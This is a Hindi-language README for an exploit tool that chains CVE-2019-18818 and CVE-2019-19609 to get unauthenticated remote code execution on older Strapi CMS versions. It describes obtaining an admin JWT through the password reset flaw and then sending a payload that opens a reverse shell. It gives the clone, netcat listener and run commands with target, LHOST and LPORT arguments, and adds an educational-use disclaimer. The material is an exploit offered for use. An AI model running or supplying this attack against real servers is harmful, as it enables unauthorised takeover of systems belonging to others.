
Strapi CMS में अप्रमाणित रिमोट कोड निष्पादन के लिए CVE-2019-18818 और CVE-2019-19609 के मिश्रण को प्रदर्शित करने वाली एक्सप्लॉइट स्क्रिप्ट।
एक्सप्लॉइट स्क्रिप्ट जो CVE-2019-18818 और CVE-2019-19609 के मिश्रण को प्रदर्शित करती है, Strapi CMS में बिना प्रमाणीकरण के रिमोट कोड निष्पादन के लिए।
यह स्क्रिप्ट Strapi CMS के संस्करण 3.0.0-beta.17.4 और उससे निचले संस्करणों में एक भेद्यता का शोषण करती है, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देती है।
यह एक्सप्लॉइट पहले पासवर्ड रीसेट भेद्यता का लाभ उठाकर एक प्रशासनिक उपयोगकर्ता के लिए JSON वेब टोकन (JWT) प्राप्त करके काम करता है। फिर इस टोकन का उपयोग Strapi CMS को एक दुर्भावनापूर्ण पेलोड भेजने के लिए किया जाता है, जो हमलावर की मशीन पर वापस एक रिवर्स शेल ट्रिगर करता है।
रिपॉजिटरी क्लोन करें:
git clone https://github.com/Hackhoven/Strapi-RCE.git
निर्देशिका में जाएँ
cd Strapi-RCE/
नेटकैट लिसनर सेट करें
nc -nlvp <LPORT>
स्क्रिप्ट को तर्कों के रूप में टारगेट URL, लोकल होस्ट IP पता और लोकल होस्ट पोर्ट के साथ चलाएँ
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस स्क्रिप्ट के अवैध या अनैतिक गतिविधियों में उपयोग का समर्थन या अनुमोदन नहीं करता है। इस स्क्रिप्ट का उपयोग केवल कानूनी सुरक्षा अनुसंधान या CTF वातावरण में किया जाना चाहिए। अपने जोखिम पर उपयोग करें।
Hackhoven द्वारा निर्मित